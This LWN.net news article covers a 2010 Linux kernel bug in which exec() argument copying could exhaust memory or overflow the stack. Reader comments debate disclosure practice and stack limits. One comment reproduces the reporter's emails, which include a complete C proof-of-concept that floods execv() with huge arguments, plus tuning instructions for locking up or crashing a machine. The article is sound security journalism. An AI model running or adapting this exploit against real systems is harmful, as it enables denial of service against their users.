Another old security problem

By Jonathan Corbet
September 8, 2010

In August, a longstanding kernel security hole related to overflowing the stack area was closed. But it turns out there are other problems in this area, at least one of which has been known about since late last year. Fixes are in the works, but it's hard not to wonder if we are not handling security issues as well as we should be.

Once again, the problem was reported by Brad Spengler, who posted a short program demonstrating how easily things can be made to go wrong. The program allocates a single 128KB array, which is filled as a long C string. Then, an array of over 24,000 char * pointers is allocated, with each entry pointing to the large string. The final step is to call execv(), using this array as the arguments to the program to be run. In other words, the exploit is telling the kernel to run a program with as many huge arguments as it can.

Once upon a time, the kernel had a limit on the maximum number of pages which could be used by a new program's arguments. This limit would have prevented any problems resulting from the sort of abuse shown by Brad's program, but it was removed for 2.6.23; it seems that any sort of limit made life difficult for Google. In its place, a new check was put in which looks like this (from fs/exec.c):

	/*
	 * Limit to 1/4-th the stack size for the argv+env strings.
	 * This ensures that:
	 *  - the remaining binfmt code will not run out of stack space,
	 *  - the program will have a reasonable amount of stack left
	 *    to work from.
	 */
	rlim = current->signal->rlim;
	if (size > ACCESS_ONCE(rlim[RLIMIT_STACK].rlim_cur) / 4) {
		put_page(page);
		return NULL;
	}

The reasoning was clear: if the arguments cannot exceed one quarter of the allowed size for the process's stack, they cannot get completely out of control. It turns out that there's a fundamental flaw in that reasoning: the stack size may well not be subject to a limit at all. In that case, the value of the limit is -1 (all ones, in other words), and the size check becomes meaningless. The end result is that, in some situations, there is no real limit on the amount of stack space which can be consumed by arguments to exec(). And, unfortunately, the consequences are not limited to the offending process.

At a minimum, Brad's exploit is able to oops the system once the stack tries to expand too far. He mentioned the possibility of expanding the stack down to address zero - thus reopening the threat of null-pointer exploits - but has not been able to figure out a way to make such exploits work. The copying of all those arguments will, naturally, consume large amounts of system memory; due to another glitch, that memory use is not properly accounted for, so, if the out-of-memory killer is brought in to straighten things out, it will not target the process which is actually causing the problem. And, as if that were not enough, the counting and copying of the argument strings is not preemptible or killable; given that it can run for a very long time, it can be very hard on the performance of the rest of the system.

Brad says that he first reported this problem in December, 2009, but got no response. More recently, he sent a note to Kees Cook, who posted a partial fix in response. That fix had some technical problems and was not applied, but Roland McGrath has posted a new set of fixes which gets closer. Roland has taken a minimal approach, not wanting to limit argument sizes more than absolutely necessary. So his patch just ensures that the stack will not grow below the minimum allowed user-space memory address (mmap_min_addr). That check, combined with the guard page added to the stack region by the August fix, should prevent the stack from growing into harmful areas. Roland has also added a preemption point to the argument-copying code to improve interactivity in the rest of the system, and a signal check allowing the process to be killed if necessary. He has not addressed the OOM killer issue, which will need to be fixed separately.

Roland's patch seems likely to fix the worst problems, though some commenters feel that it does not go far enough. One assumes that fixes will be headed toward distribution kernels in the near future. But there are a couple of discouraging things to note from this episode:

It seems that the code which is intended to block runaway resource use in a core Linux system call was never really tested at its extremes. The Linux kernel community does not have a whole lot of people who do this kind of auditing and testing, unfortunately; that leaves the task to the people who have an interest (either benign or malicious) in security issues.
It took some nine months after the initial report before anybody tried to fix the problem. That is not the sort of rapid response that this community normally takes pride in.

The problem may indicate a key shortcoming in how Linux kernel development is supported. There are thousands of developers who are funded to spend at least some of their time doing kernel work. Some of those are paid to work in security-related areas like SELinux or AppArmor. But it's not at all clear that anybody is funded simply to make sure that the core kernel is secure. That may make it easier for security problems to slip into the kernel, and it may slow down the response when somebody points out problems in the code. There is a strong (and increasing) economic interest in exploiting security issues in the kernel; perhaps we need to find a way to increase the level of interest in preventing these issues in the first place.

Index entries for this article
Kernel	Security/Vulnerabilities

to post comments

Another old security problem

Posted Sep 9, 2010 11:20 UTC (Thu) by error27 (subscriber, #8346) [Link] (1 responses)

It's hard to blame all the rest of us for not doing anything when only Ted knew about this bug for the longest time... *grumble* *grumble*

Brad, I know you read these pages. How did you find this bug in the first place? Was it through a code audit, manual testing or was there a stack trace reported on some bugzilla?

I'm pretty sure that Eugene and Kees track bugzilla entries for security related stack traces. It seems that way from the CVEs they issue.

Another old security problem

Posted Sep 9, 2010 19:52 UTC (Thu) by spender (guest, #23067) [Link]

During an audit of ways to bypass mmap_min_addr.

-Brad

Nobody working on security

Posted Sep 9, 2010 12:11 UTC (Thu) by Trou.fr (subscriber, #26289) [Link] (1 responses)

I find it completely stunning that nobody is working on a full-time paid job to handle the security of the kernel.

Microsoft, having suffered a lot a few years ago, got it right and dedicates a lot of ressources on security, internal testing/fuzzing and all (no trolling indented, just a fact).

RedHat or the Linux Foundation could certainly pay someone to improve kernel security...

Nobody working on security

Posted Sep 14, 2010 13:50 UTC (Tue) by kbad (guest, #61983) [Link]

Like Eugene Teo? :P

Another old security problem

Posted Sep 9, 2010 15:30 UTC (Thu) by alonz (subscriber, #815) [Link] (1 responses)

Unfortunately, several high-profile kernel developers have shown a distinct antipathy towards anyt issues raised by “crack-addled security people”.

Which attitude serves quite well to reduce community involvement of anyone with security awareness.

Another old security problem

Posted Sep 9, 2010 15:53 UTC (Thu) by dgm (subscriber, #49227) [Link]

I think it's more like those developers have shown antipathy towards some _people_ in the "security circus", more than towards the _issues_ themselves. Linus himself being the archetypal one, he agrees that most kernel bugs can have security implications.

Another old security problem

Posted Sep 9, 2010 18:05 UTC (Thu) by clugstj (subscriber, #4020) [Link] (7 responses)

Tried the exploit on my machine. The DOS aspect is bad, but doesn't completely lock up the machine. Of course you could run multiple instances.

What's wrong with the obvious workaround of setting a stack size limit? The exploit program then outputs a boring "execve failed" message and nothing bad happens.

Another old security problem

Posted Sep 9, 2010 20:30 UTC (Thu) by martinfick (subscriber, #4455) [Link] (6 responses)

"What's wrong with the obvious workaround of setting a stack size limit? The exploit program then outputs a boring "execve failed" message and nothing bad happens."

I suspect that the obvious problem is the limit. Who wants arbitrary limits that are not based on available resources and that affect potentially valid use cases (non exploits)? As for the nothing bad happens, did you forget that the program (and now likely others that should) didn't run? By many people's standards, that would be something bad happening. :(

valid?

Posted Sep 9, 2010 22:38 UTC (Thu) by marcH (subscriber, #57642) [Link] (5 responses)

> Who wants arbitrary limits that are not based on available resources and that affect potentially valid use cases (non exploits)?

Calling a megabytes argv a "valid use case" is a bit of a stretch.

valid?

Posted Sep 9, 2010 23:02 UTC (Thu) by bronson (guest, #4806) [Link] (1 responses)

I totally disagree. I love no longer needing to worry about find and xargs all the time. Does a dir have tens of thousands of files? Who cares! Just glob away, it just works.

A gigabytes argv would be a stretch. But megabytes? That seems pretty reasonable to me.

valid?

Posted Sep 15, 2010 0:51 UTC (Wed) by roelofs (guest, #2599) [Link]

A gigabytes argv would be a stretch. But megabytes? That seems pretty reasonable to me.

Absolutely. A minor side project of mine involves the generation of 35000 time-series images per year, each with a name of the form "fubar-XX-yyyymmdd-hhmm-UTC.png". As a same-dir glob, that works out to just over a megabyte; add a "yyyy/" directory prefix and multiple years, and you're easily into the 10MB range. Increase the time resolution by a factor of 3 to 5, and you're well on your way to 100MB. (And yes, it's very cool to watch a full-year sequence animate, particularly on a fast machine; a 5- or 10-year sequence would be even better, assuming I could hit 60fps on the decode.) Of course, at some point it becomes a database-driven custom app, but 10MB command lines are not out of the question with the trivial hack I have so far.

Greg

valid?

Posted Sep 9, 2010 23:04 UTC (Thu) by martinfick (subscriber, #4455) [Link] (2 responses)

Right, and who would ever need more than 640K of RAM? Let's constrain the arbitrary limit thinking for DOS(windows) users and devs, not for linux. ;)

valid?

Posted Sep 13, 2010 19:18 UTC (Mon) by nix (subscriber, #2304) [Link] (1 responses)

Well, actually, stupid arbitrary limits have long been part of the Unix experience. They're part that GNU set itself against, and I'm glad to say that it hasn't been part of the Linux experience heretofore, and Linux is all the better for it.

valid?

Posted Sep 13, 2010 19:25 UTC (Mon) by martinfick (subscriber, #4455) [Link]

Very true. I really should used "legacy OS" instead of "DOS/Windows" in my complaint.

Another old security problem

Posted Sep 9, 2010 23:23 UTC (Thu) by gregkh (subscriber, #8) [Link] (3 responses)

> Brad says that he first reported this problem in December, 2009,
> but got no response.

Was this sent to the security contact for the kernel? I just searched
and could not find any notice sent to security@kernel.org from Brad
during that month.

If it was not sent there, where was it sent?

Another old security problem

Posted Sep 10, 2010 0:00 UTC (Fri) by spender (guest, #23067) [Link] (2 responses)

The comment in 64bit_dos.c says where I sent it and when. Apparently that's not enough, so here are the full mails. The context was I was already working with Ted on the ext4 bug, and since he was being responsive, chose to share some additional vulnerabilities with him. You'll note my reply was within 2 hours of the response I received. With the general upstream attitude and handling of security bugs, on principle I don't email vendor-sec or security@.

I hope it's not a complaint you're making, as every time we discover one of these vulnerabilities it's fixed within grsecurity (like this 64kb heap infoleak I actually reported and wasn't credited for:
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-...), and I have it on good authority from Linus that issuing a patch is the same as full disclosure. Is it only a problem when the shoe's on the other foot?

-Brad

2694 r + Dec 11 12:12PM tytso@mit.edu Re: ext4 bug
2695 r + Dec 11 03:37PM tytso@mit.edu └─>

X-Spam-ASN: AS14742 69.25.192.0/20
X-Spam-Checker-Version: SpamAssassin 3.2.4 (2008-01-01) on www.grsecurity.net
X-Spam-Level:
X-Spam-Status: No, score=0.0 required=5.0 tests=BAYES_50 autolearn=ham
version=3.2.4
From: tytso@mit.edu
To: Brad Spengler <spender@grsecurity.net>
Subject: Re: ext4 bug
X-SA-Exim-Connect-IP: <locally generated>
X-SA-Exim-Mail-From: tytso@thunk.org
X-SA-Exim-Scanned: No (on thunker.thunk.org); SAEximRunCond expanded to false

On Fri, Dec 11, 2009 at 01:51:32PM -0500, Brad Spengler wrote:
> I've also got two local DoS mm-related bugs to be fixed if you'd like to
> take a look at them. They exist in all 64bit kernels since 2.6.26 or
> so. The first is an easy fix (we've fixed it in grsec for some time),
> but the other one requires some more thinking and decision making (it's
> memory exhaustion that causes a complete lockup of the machine -- and
> the OOM killer is unaware of the memory because it's not
> associated/accounted for by any task).

Sure, send them my way!

- Ted

842 sF Dec 11 11:57AM To tytso@mit.ed ext4 bug
843 sF Dec 11 01:51PM To tytso@mit.ed └─>
844 sF Dec 11 05:34PM To tytso@mit.ed └─┬─>
845 sF Dec 11 05:40PM To tytso@mit.ed └─>

To: tytso@mit.edu
Subject: Re: ext4 bug

[-- PGP output follows (current time: Thu 09 Sep 2010 07:33:02 PM EDT) --]
gpg: Signature made Fri 11 Dec 2009 05:34:56 PM EST using DSA key ID 4245D46A
gpg: Good signature from "Bradley Spengler (spender) <spender@grsecurity.net>"
[-- End of PGP output --]

[-- The following data is signed --]

> Sure, send them my way!
>
> - Ted

Ok, the second issue should be clear with the following PoC:
(make sure to set your stack soft-limit to unlimited first, and compile
it as 32bit, run on a 64bit machine)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NUM_ARGS 9000

int main(void)
{
char **args;
char *str;
int i;

str = malloc(128 * 1024);
memset(str, 'A', 128 * 1024 - 1);
str[128 * 1024 - 1] = '\0';
args = malloc(NUM_ARGS * sizeof(char *));
for (i = 0; i < (NUM_ARGS - 1); i++)
args[i] = str;
args[i] = NULL;

execv("/bin/sh", args);
printf("execve failed\n");

return 0;
}

It requires very little memory on the part of the program doing the
exec, but then explodes in kernel-space as each 128KB arg is copied into
its own allocation thousands of times. The system slows to the point of
being unusable (or with the right arg amount, will halt the box from the
problem below) Meanwhile, none of the processes involved in this will
get killed by the OOM killer, as none of the memory is accounted for.
(that's where the thinking comes in on how to properly fix it)

first issue is fs/exec.c:shift_arg_pages()
Using the PoC above, you can change NUM_ARGS such that instead of
exhausting all memory and locking up the system, you cause the stack to
expand down so far that it tries to wrap around the address space,
triggering the BUG_ON(new_start > new_end)

The reason this is possible on 64bit machines is because the resource
check in get_arg_page: if (size > rlim[RLIMIT_STACK].rlim_cur / 4)
allows stack sizes that are larger than the 32bit address space, as
rlim_cur is a long, and the RLIM_INFINITY soft limit is being treated
an actual size count, being both larger than the possible addressing on
x86 and x64, even after being divided by 4. So by carefully choosing
NUM_ARGS, you can cause the stack randomization present in the kernel to
attempt to shift the arg pages down below the beginning of the address
space, triggering the BUG. It can be made easier (depending on the
amount of RAM on the machine) by using the 3G personality.

-Brad

[-- End of signed data --]

To: tytso@mit.edu
Subject: Re: ext4 bug

[-- PGP output follows (current time: Thu 09 Sep 2010 07:33:33 PM EDT) --]
gpg: Signature made Fri 11 Dec 2009 05:40:37 PM EST using DSA key ID 4245D46A
gpg: Good signature from "Bradley Spengler (spender) <spender@grsecurity.net>"
[-- End of PGP output --]

[-- The following data is signed --]

Sorry, NUM_ARGS should be set larger -- around 24550 or so, to fill up
the full 3GB. And the resource exhaustion works on 32bit, just the
BUG_ON is only triggerable on 64bit machines.

-Brad

[-- End of signed data --]

Another old security problem

Posted Sep 10, 2010 20:23 UTC (Fri) by gregkh (subscriber, #8) [Link]

> With the general upstream attitude and handling of security bugs, on
> principle I don't email vendor-sec or security@.

That's sad, as security@kernel.org is the only group that will guarantee
that we will look at the issue and work to resolve it in a quick manner.

> Is it only a problem when the shoe's on the other foot?

No, I was worried that something got reported to security@kernel.org
that we did not respond to in a timely manner.

If you notify random kernel developers, one of whom is not part of the
kernel security team, then we can't guarantee any type of response.
Which, sadly, seems to be the case here. Otherwise the problem would
have been resolved a long time ago.

In the future, it would be great if you could notify security@kernel.org
about these types of problems so that they can be handled properly.

thanks.

Another old security problem

Posted Sep 10, 2010 20:31 UTC (Fri) by Trelane (subscriber, #56877) [Link]

since he was being responsive, chose to share some additional vulnerabilities with him.

Mmm, this sounds like you sit on vulnerabilities, choosing to notify people who can fix it upstream if and only if they're "being responsive". Is this accurate? Are you sitting on any now?

With the general upstream attitude and handling of security bugs, on principle I don't email vendor-sec or security@.

What principle is this that you're acting on?

Another old security problem

Posted Sep 10, 2010 21:25 UTC (Fri) by rilder (guest, #59804) [Link] (7 responses)

I am not sure about the unlimited stack size. Most (or all) distro kernels restrict stack size. In my case it is 8 MB which I think is quite sufficient even for large systems.

Are there applications which would *normally* require stack greater than this ?

Another old security problem

Posted Sep 10, 2010 23:14 UTC (Fri) by daglwn (guest, #65432) [Link] (5 responses)

Absolutely. Many scientific codes regularly exceed this amount of stack.

Another old security problem

Posted Sep 11, 2010 0:02 UTC (Sat) by jspaleta (subscriber, #50639) [Link] (1 responses)

I would not call scientific codes... normal.. nor the people who run them.

-jef

Another old security problem

Posted Sep 11, 2010 4:29 UTC (Sat) by Trelane (subscriber, #56877) [Link]

Hey! I represent that remark.

Another old security problem

Posted Sep 11, 2010 10:50 UTC (Sat) by rilder (guest, #59804) [Link] (2 responses)

What I implied through that comments is this - in regular desktop environments it won't happen(cat /proc/**/status | grep -i vmstk didn't reveal more than 100-200 KB) . However, higher stack usage may be visible in applications in enterprise or as you said scientific establishments. Though, in such conditions the applications/packages installed on the host remain stable over time and are carefully chosen with lot of testing, so any of these exploits may not find their place there.

Another old security problem

Posted Sep 11, 2010 14:01 UTC (Sat) by spender (guest, #23067) [Link] (1 responses)

I'm not sure you understand the meaning of 'exploit' or the difference between soft and hard limits.

-Brad

Another old security problem

Posted Sep 15, 2010 9:10 UTC (Wed) by nix (subscriber, #2304) [Link]

Rilder made a perfectly good point: applications do not generally need vast stacks (not even Emacs!). Thus it is reasonable to impose a hard limit.

That distros generally impose soft limits instead (for no particularly obvious reason in the case of stack size) is no barrier to imposing a hard limit yourself.

Another old security problem

Posted Sep 17, 2010 20:34 UTC (Fri) by oak (guest, #2786) [Link]

> I am not sure about the unlimited stack size. Most (or all) distro kernels restrict stack size. In my case it is 8 MB which I think is quite sufficient even for large systems.

The *default* for *thread* stacks (which are of fixed size instead of automatically growing like main process stack) is commonly set to 8MB.